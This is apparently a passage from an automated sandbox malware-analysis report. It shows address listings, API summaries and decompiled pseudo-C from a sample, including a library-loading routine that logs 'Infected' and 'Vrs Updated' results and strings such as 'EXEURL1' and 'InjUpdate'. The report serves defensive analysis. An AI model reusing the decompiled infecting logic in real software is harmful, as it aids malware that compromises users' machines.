                                                                                                                                                                                                                            0x0049811d
                                                                                                                                                                                                                            0x00498120
                                                                                                                                                                                                                            0x00498123
                                                                                                                                                                                                                            0x00498130
                                                                                                                                                                                                                            0x00498138
                                                                                                                                                                                                                            0x0049814a
                                                                                                                                                                                                                            0x00497d8f
                                                                                                                                                                                                                            0x00497d8f
                                                                                                                                                                                                                            0x00497d96
                                                                                                                                                                                                                            0x00497d99
                                                                                                                                                                                                                            0x00497d9a
                                                                                                                                                                                                                            0x00497da7
                                                                                                                                                                                                                            0x00497dad
                                                                                                                                                                                                                            0x00497d9c
                                                                                                                                                                                                                            0x00497d9c
                                                                                                                                                                                                                            0x00497d9d
                                                                                                                                                                                                                            0x00497db7
                                                                                                                                                                                                                            0x00497dbd
                                                                                                                                                                                                                            0x00497d9f
                                                                                                                                                                                                                            0x00497da0
                                                                                                                                                                                                                            0x00497dc7
                                                                                                                                                                                                                            0x00497dcd
                                                                                                                                                                                                                            0x00497dcd
                                                                                                                                                                                                                            0x00497da0
                                                                                                                                                                                                                            0x00497d9d
                                                                                                                                                                                                                            0x00497dd4
                                                                                                                                                                                                                            0x00497dd5
                                                                                                                                                                                                                            0x00497dda
                                                                                                                                                                                                                            0x00497ddd
                                                                                                                                                                                                                            0x00497de5
                                                                                                                                                                                                                            0x00497dea
                                                                                                                                                                                                                            0x00497df5
                                                                                                                                                                                                                            0x00497dfa
                                                                                                                                                                                                                            0x00497dfc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00497f72
                                                                                                                                                                                                                            0x00497f77
                                                                                                                                                                                                                            0x00497f7e
                                                                                                                                                                                                                            0x00497f81
                                                                                                                                                                                                                            0x00497f90
                                                                                                                                                                                                                            0x00497f93
                                                                                                                                                                                                                            0x00497f97
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00497f9d
                                                                                                                                                                                                                            0x00497f9d
                                                                                                                                                                                                                            0x00497fa1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00497fa7
                                                                                                                                                                                                                            0x00497fae
                                                                                                                                                                                                                            0x00497fb1
                                                                                                                                                                                                                            0x00497fb2
                                                                                                                                                                                                                            0x00497fbf
                                                                                                                                                                                                                            0x00497fc5
                                                                                                                                                                                                                            0x00497fb4
                                                                                                                                                                                                                            0x00497fb4
                                                                                                                                                                                                                            0x00497fb5
                                                                                                                                                                                                                            0x00497fcf
                                                                                                                                                                                                                            0x00497fd5
                                                                                                                                                                                                                            0x00497fb7
                                                                                                                                                                                                                            0x00497fb8
                                                                                                                                                                                                                            0x00497fdf
                                                                                                                                                                                                                            0x00497fe5
                                                                                                                                                                                                                            0x00497fe5
                                                                                                                                                                                                                            0x00497fb8
                                                                                                                                                                                                                            0x00497fb5
                                                                                                                                                                                                                            0x00497fec
                                                                                                                                                                                                                            0x00497fed
                                                                                                                                                                                                                            0x00497ff2
                                                                                                                                                                                                                            0x00497ff5
                                                                                                                                                                                                                            0x00497ffd
                                                                                                                                                                                                                            0x00498002
                                                                                                                                                                                                                            0x00498014
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004980fc
                                                                                                                                                                                                                            0x004980fe
                                                                                                                                                                                                                            0x004980ff
                                                                                                                                                                                                                            0x0049810e
                                                                                                                                                                                                                            0x00498111
                                                                                                                                                                                                                            0x00498115
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00498115
                                                                                                                                                                                                                            0x0049801c
                                                                                                                                                                                                                            0x00498021
                                                                                                                                                                                                                            0x0049802d
                                                                                                                                                                                                                            0x00498033
                                                                                                                                                                                                                            0x0049803a
                                                                                                                                                                                                                            0x00498040
                                                                                                                                                                                                                            0x00498040
                                                                                                                                                                                                                            0x0049803c
                                                                                                                                                                                                                            0x0049803c
                                                                                                                                                                                                                            0x0049803c
                                                                                                                                                                                                                            0x0049802f
                                                                                                                                                                                                                            0x0049802f
                                                                                                                                                                                                                            0x0049802f
                                                                                                                                                                                                                            0x00498044
                                                                                                                                                                                                                            0x00498045
                                                                                                                                                                                                                            0x0049804a
                                                                                                                                                                                                                            0x0049804d
                                                                                                                                                                                                                            0x00498053
                                                                                                                                                                                                                            0x00498060
                                                                                                                                                                                                                            0x00498065
                                                                                                                                                                                                                            0x004980c2
                                                                                                                                                                                                                            0x004980c7
                                                                                                                                                                                                                            0x004980cc
                                                                                                                                                                                                                            0x004980ce
                                                                                                                                                                                                                            0x004980d7
                                                                                                                                                                                                                            0x004980d7
                                                                                                                                                                                                                            0x00498067
                                                                                                                                                                                                                            0x00498072
                                                                                                                                                                                                                            0x0049807e
                                                                                                                                                                                                                            0x0049809a
                                                                                                                                                                                                                            0x0049809f
                                                                                                                                                                                                                            0x004980a4
                                                                                                                                                                                                                            0x004980a6
                                                                                                                                                                                                                            0x004980af
                                                                                                                                                                                                                            0x004980af
                                                                                                                                                                                                                            0x00498080
                                                                                                                                                                                                                            0x00498087
                                                                                                                                                                                                                            0x00498087
                                                                                                                                                                                                                            0x0049807e
                                                                                                                                                                                                                            0x004980de
                                                                                                                                                                                                                            0x004980e1
                                                                                                                                                                                                                            0x004980f2
                                                                                                                                                                                                                            0x004980f5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004980f5
                                                                                                                                                                                                                            0x00497f97
                                                                                                                                                                                                                            0x00497e11
                                                                                                                                                                                                                            0x00497e27
                                                                                                                                                                                                                            0x00497e2f
                                                                                                                                                                                                                            0x00497e35
                                                                                                                                                                                                                            0x00497e42
                                                                                                                                                                                                                            0x00497e5b
                                                                                                                                                                                                                            0x00497e63
                                                                                                                                                                                                                            0x00497e69
                                                                                                                                                                                                                            0x00497e76
                                                                                                                                                                                                                            0x00497e8f
                                                                                                                                                                                                                            0x00497e97
                                                                                                                                                                                                                            0x00497e9d
                                                                                                                                                                                                                            0x00497eaa
                                                                                                                                                                                                                            0x00497ec3
                                                                                                                                                                                                                            0x00497ecb
                                                                                                                                                                                                                            0x00497ed1
                                                                                                                                                                                                                            0x00497ede
                                                                                                                                                                                                                            0x00497ef5
                                                                                                                                                                                                                            0x00497ef7
                                                                                                                                                                                                                            0x00497eff
                                                                                                                                                                                                                            0x00497f05
                                                                                                                                                                                                                            0x00497f12
                                                                                                                                                                                                                            0x00497f17
                                                                                                                                                                                                                            0x00497f1c
                                                                                                                                                                                                                            0x00497f23
                                                                                                                                                                                                                            0x00497f28
                                                                                                                                                                                                                            0x00497f2d
                                                                                                                                                                                                                            0x00497f37
                                                                                                                                                                                                                            0x00497f3d
                                                                                                                                                                                                                            0x00497f4a
                                                                                                                                                                                                                            0x00497f4f
                                                                                                                                                                                                                            0x00497f3f
                                                                                                                                                                                                                            0x00497f3f
                                                                                                                                                                                                                            0x00497f3f
                                                                                                                                                                                                                            0x00497f56
                                                                                                                                                                                                                            0x00497f5e
                                                                                                                                                                                                                            0x00497f65
                                                                                                                                                                                                                            0x00497f67
                                                                                                                                                                                                                            0x00497f68
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00497f68

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • Sleep.KERNEL32(0000EA60,00000000,0049814B,?,?,?,?,00000000,00000000), ref: 00497D15
                                                                                                                                                                                                                              • Part of subcall function 00473490: ShellExecuteEx.SHELL32(0000003C), ref: 00473512
                                                                                                                                                                                                                              • Part of subcall function 00473490: WaitForSingleObject.KERNEL32(00000000,00000032,00000000,00473564), ref: 00473536
                                                                                                                                                                                                                              • Part of subcall function 0045A800: PostQuitMessage.USER32(00000000), ref: 0045A80B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExecuteMessageObjectPostQuitShellSingleSleepWait
                                                                                                                                                                                                                            • String ID: .exe$.ini$EXEURL1$InjUpdate$PORT$VER
                                                                                                                                                                                                                            • API String ID: 1631069871-204213252
                                                                                                                                                                                                                            • Opcode ID: f28c68a9cf740bc75c450aae053dd7dd02a563239b3f7edc268703e66f497ea7
                                                                                                                                                                                                                            • Instruction ID: 45283d241bb881e06991861ba9452227acefdf6b6ef9343d0a562746dac06cd8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f28c68a9cf740bc75c450aae053dd7dd02a563239b3f7edc268703e66f497ea7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BC15130604108DFDF10EB69D852A9E7BB5EB96304F61847BE500E7391DB38AD0ACB5D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0044A960 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 187windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                            			E0044A960(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v13;
				struct tagMENUITEMINFOA _v61;
				char _v68;
				intOrPtr _t103;
				CHAR* _t109;
				char _t115;
				short _t149;
				void* _t154;
				intOrPtr _t161;
				intOrPtr _t184;
				struct HMENU__* _t186;
				int _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t196;
				void* _t205;

				_t155 = __ecx;
				_v68 = 0;
				_v12 = 0;
				_v5 = __ecx;
				_t186 = __edx;
				_t154 = __eax;
				_push(_t196);
				_push(0x44abbb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t196 + 0xffffffc0;
				if( *((char*)(__eax + 0x3e)) == 0) {
					L22:
					_pop(_t161);
					 *[fs:eax] = _t161;
					_push(0x44abc2);
					E004049C0( &_v68);
					return E004049C0( &_v12);
				}
				E00404A58( &_v12,  *((intOrPtr*)(__eax + 0x30)));
				if(E0044C8DC(_t154) <= 0) {
					__eflags =  *((short*)(_t154 + 0x60));
					if( *((short*)(_t154 + 0x60)) == 0) {
						L8:
						if((GetVersion() & 0x000000ff) < 4) {
							_t190 =  *(0x49bdf0 + ((E00404DCC( *((intOrPtr*)(_t154 + 0x30)), 0x44abe0) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0049BDE4 |  *0x0049BDD4 |  *0x0049BDDC | 0x00000400;
							_t103 = E0044C8DC(_t154);
							__eflags = _t103;
							if(_t103 <= 0) {
								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E00404E80(_v12));
							} else {
								_t109 = E00404E80( *((intOrPtr*)(_t154 + 0x30)));
								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0044AE70(_t154), _t109);
							}
							goto L22;
						}
						_v61.cbSize = 0x2c;
						_v61.fMask = 0x3f;
						_t192 = E0044CE98(_t154);
						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E0044C4B4(_t154) == 0) {
							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
								L14:
								_t115 = 0;
								goto L16;
							}
							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
							if(_t205 == 0) {
								goto L15;
							}
							goto L14;
						} else {
							L15:
							_t115 = 1;
							L16:
							_v13 = _t115;
							_v61.fType =  *(0x49be24 + ((E00404DCC( *((intOrPtr*)(_t154 + 0x30)), 0x44abe0) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x0049BE1C |  *0x0049BDF8 |  *0x0049BE2C |  *0x0049BE34;
							_v61.fState =  *0x0049BE04 |  *0x0049BE14 |  *0x0049BE0C;
							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
							_v61.hSubMenu = 0;
							_v61.hbmpChecked = 0;
							_v61.hbmpUnchecked = 0;
							_v61.dwTypeData = E00404E80(_v12);
							if(E0044C8DC(_t154) > 0) {
								_v61.hSubMenu = E0044AE70(_t154);
							}
							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
							goto L22;
						}
					}
					_t193 =  *((intOrPtr*)(_t154 + 0x64));
					__eflags = _t193;
					if(_t193 == 0) {
						L7:
						_push(_v12);
						_push(0x44abd4);
						E00449FC4( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
						_push(_v68);
						E00404D40();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t193 + 0x64));
					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
						goto L7;
					}
					_t184 =  *0x449854; // 0x4498a0
					_t149 = E00403D78( *((intOrPtr*)(_t193 + 4)), _t184);
					__eflags = _t149;
					if(_t149 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v61.hSubMenu = E0044AE70(_t154);
				goto L8;
			}





















                                                                                                                                                                                                                            0x0044a960
                                                                                                                                                                                                                            0x0044a96b
                                                                                                                                                                                                                            0x0044a96e
                                                                                                                                                                                                                            0x0044a971
                                                                                                                                                                                                                            0x0044a974
                                                                                                                                                                                                                            0x0044a976
                                                                                                                                                                                                                            0x0044a97a
                                                                                                                                                                                                                            0x0044a97b
                                                                                                                                                                                                                            0x0044a980
                                                                                                                                                                                                                            0x0044a983
                                                                                                                                                                                                                            0x0044a98a
                                                                                                                                                                                                                            0x0044ab9d
                                                                                                                                                                                                                            0x0044ab9f
                                                                                                                                                                                                                            0x0044aba2
                                                                                                                                                                                                                            0x0044aba5
                                                                                                                                                                                                                            0x0044abad
                                                                                                                                                                                                                            0x0044abba
                                                                                                                                                                                                                            0x0044abba
                                                                                                                                                                                                                            0x0044a996
                                                                                                                                                                                                                            0x0044a9a4
                                                                                                                                                                                                                            0x0044a9b2
                                                                                                                                                                                                                            0x0044a9b7
                                                                                                                                                                                                                            0x0044a9fc
                                                                                                                                                                                                                            0x0044aa0a
                                                                                                                                                                                                                            0x0044ab56
                                                                                                                                                                                                                            0x0044ab5e
                                                                                                                                                                                                                            0x0044ab63
                                                                                                                                                                                                                            0x0044ab65
                                                                                                                                                                                                                            0x0044ab98
                                                                                                                                                                                                                            0x0044ab67
                                                                                                                                                                                                                            0x0044ab6a
                                                                                                                                                                                                                            0x0044ab7f
                                                                                                                                                                                                                            0x0044ab7f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ab65
                                                                                                                                                                                                                            0x0044aa10
                                                                                                                                                                                                                            0x0044aa17
                                                                                                                                                                                                                            0x0044aa25
                                                                                                                                                                                                                            0x0044aa29
                                                                                                                                                                                                                            0x0044aa40
                                                                                                                                                                                                                            0x0044aa4e
                                                                                                                                                                                                                            0x0044aa4e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044aa4e
                                                                                                                                                                                                                            0x0044aa4a
                                                                                                                                                                                                                            0x0044aa4c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044aa52
                                                                                                                                                                                                                            0x0044aa52
                                                                                                                                                                                                                            0x0044aa52
                                                                                                                                                                                                                            0x0044aa54
                                                                                                                                                                                                                            0x0044aa54
                                                                                                                                                                                                                            0x0044aaa3
                                                                                                                                                                                                                            0x0044aaca
                                                                                                                                                                                                                            0x0044aad1
                                                                                                                                                                                                                            0x0044aad6
                                                                                                                                                                                                                            0x0044aadb
                                                                                                                                                                                                                            0x0044aae0
                                                                                                                                                                                                                            0x0044aaeb
                                                                                                                                                                                                                            0x0044aaf7
                                                                                                                                                                                                                            0x0044ab00
                                                                                                                                                                                                                            0x0044ab00
                                                                                                                                                                                                                            0x0044ab0c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ab0c
                                                                                                                                                                                                                            0x0044aa29
                                                                                                                                                                                                                            0x0044a9b9
                                                                                                                                                                                                                            0x0044a9bc
                                                                                                                                                                                                                            0x0044a9be
                                                                                                                                                                                                                            0x0044a9d8
                                                                                                                                                                                                                            0x0044a9d8
                                                                                                                                                                                                                            0x0044a9db
                                                                                                                                                                                                                            0x0044a9e7
                                                                                                                                                                                                                            0x0044a9ec
                                                                                                                                                                                                                            0x0044a9f7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044a9f7
                                                                                                                                                                                                                            0x0044a9c0
                                                                                                                                                                                                                            0x0044a9c4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044a9c9
                                                                                                                                                                                                                            0x0044a9cf
                                                                                                                                                                                                                            0x0044a9d4
                                                                                                                                                                                                                            0x0044a9d6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044a9d6
                                                                                                                                                                                                                            0x0044a9ad
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 0044AB0C
                                                                                                                                                                                                                            • GetVersion.KERNEL32(00000000,0044ABBB), ref: 0044A9FC
                                                                                                                                                                                                                              • Part of subcall function 0044AE70: CreatePopupMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE8B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Menu$CreateInsertItemPopupVersion
                                                                                                                                                                                                                            • String ID: ,$?
                                                                                                                                                                                                                            • API String ID: 133695497-2308483597
                                                                                                                                                                                                                            • Opcode ID: ce329fbcfb68304f05595de6c1e6c5ccc5445e86f25c9360cd087edaa36d7743
                                                                                                                                                                                                                            • Instruction ID: 398804152d519dd2ee62b9937964e6d4d0d5c4b5bb315d29c079f0e0da2fd4ec
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce329fbcfb68304f05595de6c1e6c5ccc5445e86f25c9360cd087edaa36d7743
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4861E270A042449BEB10EF79D881A9A77FAFF09304F04457AEA44E7356E738EC55C749
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004776D4 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168libraryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E004776D4(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8) {
				void* _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				void* __ecx;
				void* _t95;
				char _t96;
				struct HINSTANCE__* _t107;
				struct HINSTANCE__* _t109;
				void* _t112;
				struct HINSTANCE__* _t113;
				struct HINSTANCE__* _t132;
				intOrPtr _t156;
				intOrPtr _t180;
				intOrPtr _t191;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr _t210;

				_t203 = __esi;
				_t202 = __edi;
				_t205 = _t206;
				_t156 = 7;
				do {
					_push(0);
					_push(0);
					_t156 = _t156 - 1;
				} while (_t156 != 0);
				_push(_t156);
				_t1 =  &_v8;
				 *_t1 = _t156;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v12);
				E00404E70(_v16);
				_push(_t205);
				_push(0x4778dd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t206;
				if( *((intOrPtr*)( *_v8 + 0x14))() - 1 < 0) {
					L13:
					_pop(_t180);
					 *[fs:eax] = _t180;
					_push(0x4778e4);
					E004049E4( &_v68, 0xb);
					return E004049E4( &_v16, 2);
				}
				_t95 =  *((intOrPtr*)( *_v8 + 0x14))() - 1;
				if(_t95 < 0) {
					goto L13;
				}
				_t96 = _t95 + 1;
				_t210 = _t96;
				_v24 = _t96;
				_v20 = 0;
				do {
					 *((intOrPtr*)( *_v8 + 0xc))();
					if(E00409A48(_v28, _t210) != 0) {
						 *[fs:eax] = _t206;
						_t146 =  *_v8;
						 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x47789f, _t205);
						 *0x49ec78 = LoadLibraryA(E00404E80(_v32));
						_t107 =  *0x49ec78; // 0x0
						if(E004770E4(_t107,  *_v8, _v16, _t202, _t203) != 0) {
							_t109 =  *0x49ec78; // 0x0
							E0047717C(_t109, _t146,  &_v48, _v16, _t202, _t203);
							_t112 = E00409628(_v48, _t205, __eflags);
							__eflags = _t112 - _a8;
							if(_t112 >= _a8) {
								_t113 =  *0x49ec78; // 0x0
								FreeLibrary(_t113);
								 *((intOrPtr*)( *_v8 + 0xc))();
								E00404CCC( &_v64, _v68, "Infected Canceled -> ");
								 *((intOrPtr*)( *_v8 + 0x20))();
							} else {
								 *((intOrPtr*)( *_v8 + 0xc))();
								E004774A8(_v52,  *_v8, _v12, _t202, _t203, 1);
								 *((intOrPtr*)( *_v8 + 0xc))();
								E00404CCC( &_v56, _v60, "Vrs Updated -> ");
								 *((intOrPtr*)( *_v8 + 0x20))();
							}
						} else {
							_t132 =  *0x49ec78; // 0x0
							FreeLibrary(_t132);
							 *((intOrPtr*)( *_v8 + 0xc))();
							E004774A8(_v36,  *_v8, _v12, _t202, _t203, 0);
							 *((intOrPtr*)( *_v8 + 0xc))();
							E00404CCC( &_v40, _v44, "Completed -> ");
							 *((intOrPtr*)( *_v8 + 0x20))();
						}
						_pop(_t191);
						 *[fs:eax] = _t191;
					}
					_v20 = _v20 + 1;
					_t75 =  &_v24;
					 *_t75 = _v24 - 1;
				} while ( *_t75 != 0);
				goto L13;
			}

































                                                                                                                                                                                                                            0x004776d4
                                                                                                                                                                                                                            0x004776d4
                                                                                                                                                                                                                            0x004776d5
                                                                                                                                                                                                                            0x004776d8
                                                                                                                                                                                                                            0x004776dd
                                                                                                                                                                                                                            0x004776dd
                                                                                                                                                                                                                            0x004776df
                                                                                                                                                                                                                            0x004776e1
                                                                                                                                                                                                                            0x004776e1
                                                                                                                                                                                                                            0x004776e4
                                                                                                                                                                                                                            0x004776e5
                                                                                                                                                                                                                            0x004776e5
                                                                                                                                                                                                                            0x004776e8
                                                                                                                                                                                                                            0x004776e9
                                                                                                                                                                                                                            0x004776ea
                                                                                                                                                                                                                            0x004776eb
                                                                                                                                                                                                                            0x004776ee
                                                                                                                                                                                                                            0x004776f1
                                                                                                                                                                                                                            0x004776f7
                                                                                                                                                                                                                            0x004776ff
                                                                                                                                                                                                                            0x00477706
                                                                                                                                                                                                                            0x00477707
                                                                                                                                                                                                                            0x0047770c
                                                                                                                                                                                                                            0x0047770f
                                                                                                                                                                                                                            0x0047771b
                                                                                                                                                                                                                            0x004778b5
                                                                                                                                                                                                                            0x004778b7
                                                                                                                                                                                                                            0x004778ba
                                                                                                                                                                                                                            0x004778bd
                                                                                                                                                                                                                            0x004778ca
                                                                                                                                                                                                                            0x004778dc
                                                                                                                                                                                                                            0x004778dc
                                                                                                                                                                                                                            0x00477729
                                                                                                                                                                                                                            0x0047772c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00477732
                                                                                                                                                                                                                            0x00477732
                                                                                                                                                                                                                            0x00477733
                                                                                                                                                                                                                            0x00477736
                                                                                                                                                                                                                            0x0047773d
                                                                                                                                                                                                                            0x00477748
                                                                                                                                                                                                                            0x00477755
                                                                                                                                                                                                                            0x00477766
                                                                                                                                                                                                                            0x00477772
                                                                                                                                                                                                                            0x00477774
                                                                                                                                                                                                                            0x00477785
                                                                                                                                                                                                                            0x0047778d
                                                                                                                                                                                                                            0x00477799
                                                                                                                                                                                                                            0x004777fb
                                                                                                                                                                                                                            0x00477800
                                                                                                                                                                                                                            0x00477808
                                                                                                                                                                                                                            0x0047780d
                                                                                                                                                                                                                            0x00477810
                                                                                                                                                                                                                            0x0047785e
                                                                                                                                                                                                                            0x00477864
                                                                                                                                                                                                                            0x00477874
                                                                                                                                                                                                                            0x00477882
                                                                                                                                                                                                                            0x00477892
                                                                                                                                                                                                                            0x00477812
                                                                                                                                                                                                                            0x0047781f
                                                                                                                                                                                                                            0x0047782b
                                                                                                                                                                                                                            0x0047783b
                                                                                                                                                                                                                            0x00477849
                                                                                                                                                                                                                            0x00477859
                                                                                                                                                                                                                            0x00477859
                                                                                                                                                                                                                            0x0047779b
                                                                                                                                                                                                                            0x0047779b
                                                                                                                                                                                                                            0x004777a1
                                                                                                                                                                                                                            0x004777b3
                                                                                                                                                                                                                            0x004777bf
                                                                                                                                                                                                                            0x004777cf
                                                                                                                                                                                                                            0x004777dd
                                                                                                                                                                                                                            0x004777ed
                                                                                                                                                                                                                            0x004777ed
                                                                                                                                                                                                                            0x00477897
                                                                                                                                                                                                                            0x0047789a
                                                                                                                                                                                                                            0x0047789a
                                                                                                                                                                                                                            0x004778a9
                                                                                                                                                                                                                            0x004778ac
                                                                                                                                                                                                                            0x004778ac
                                                                                                                                                                                                                            0x004778ac
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00000006,00000000,00000000), ref: 00477780
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,?,?,?,?,?,00000006,00000000,00000000), ref: 004777A1
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,?,?,?,?,?,00000006,00000000,00000000), ref: 00477864
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Library$Free$Load
                                                                                                                                                                                                                            • String ID: Completed -> $Infected Canceled -> $Vrs Updated ->
                                                                                                                                                                                                                            • API String ID: 2391024519-3592865843
                                                                                                                                                                                                                            • Opcode ID: e5ca2df3611e2abfeeb87632b8b91ed25a998eaf615441498497ba08c9cca89b
                                                                                                                                                                                                                            • Instruction ID: 17185f43945d3bc0c2e5cc5bb4bd267fdef97e65ffff577caacc568d39ef9c26
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5ca2df3611e2abfeeb87632b8b91ed25a998eaf615441498497ba08c9cca89b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32611878A04209DFDB04EFA5C8849EEB7B5FF48300F6180A6E904A7351CB34AE05CF65
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00442BD0 Relevance: 10.7, APIs: 7, Instructions: 156COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E00442BD0(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				void _v12;
				intOrPtr _v16;
				int _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr* _t80;
				intOrPtr _t91;
				void* _t119;
				intOrPtr _t136;
				intOrPtr _t145;
				void* _t148;

				asm("movsd");
				asm("movsd");
